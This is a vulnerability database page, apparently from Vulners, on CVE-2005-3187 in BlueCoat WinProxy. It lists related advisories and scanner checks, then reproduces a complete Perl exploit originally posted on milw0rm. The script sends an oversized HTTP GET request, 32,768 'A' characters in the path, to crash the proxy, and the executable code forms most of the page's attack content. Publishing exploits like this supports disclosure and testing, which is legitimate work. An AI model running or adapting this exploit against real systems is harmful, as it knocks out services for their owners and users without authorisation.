| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| BlueCoat WinProxy <= 6.0 R1c (GET Request) Denial of Service Exploit | 7 Jan 200600:00 | – | zdt | |
| WinProxy < 6.1a Multiple Vulnerabilities | 6 Jan 200600:00 | – | nessus | |
| WinProxy < 6.1a Multiple Vulnerabilities (credentialed check) | 10 Jan 200600:00 | – | nessus | |
| WinProxy < 6.1a HTTP Proxy Multiple Vulnerabilities | 10 Jan 200600:00 | – | nessus | |
| CVE-2005-3187 | 5 Jan 200623:00 | – | cve | |
| CVE-2005-3187 | 5 Jan 200623:00 | – | cvelist | |
| EUVD-2005-3186 | 7 Oct 202500:30 | – | euvd | |
| BlueCoat WinProxy 6.0 R1c - GET Denial of Service | 7 Jan 200600:00 | – | exploitpack | |
| CVE-2005-3187 | 31 Dec 200505:00 | – | nvd | |
| iDefense Security Advisory 01.05.06: Blue Coat WinProxy Remote DoS Vulnerability | 7 Jan 200600:00 | – | securityvulns |
#!perl
#
# "WinProxy 6.0 R1c" Remote DoS Exploit
#
# Author: FistFucker
# e-Mail: [email protected]
#
#
# Advisory:
# http://www.idefense.com/intelligence/vulnerabilities/display.php?id=363
#
# CVE info:
# CAN-2005-3187
#
use IO::Socket;
#
# destination IP address
#
$ip = '127.0.0.1';
#
# destination TCP port
#
$port = 80;
print '"WinProxy 6.0 R1c" Remote DoS Exploit'."\n\n";
$sock = IO::Socket::INET->new
(
PeerAddr => $ip,
PeerPort => $port,
Proto => 'tcp',
Timeout => 2
) or print '[-] Error: Could not establish a connection to the server!' and exit(1);
print "[+] Connected.\n";
$sock->send('GET /'. 'A' x 32768 ." HTTP/1.1\r\n\r\n");
print "[+] DoS string has been sent.";
close($sock);
# milw0rm.com [2006-01-07]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation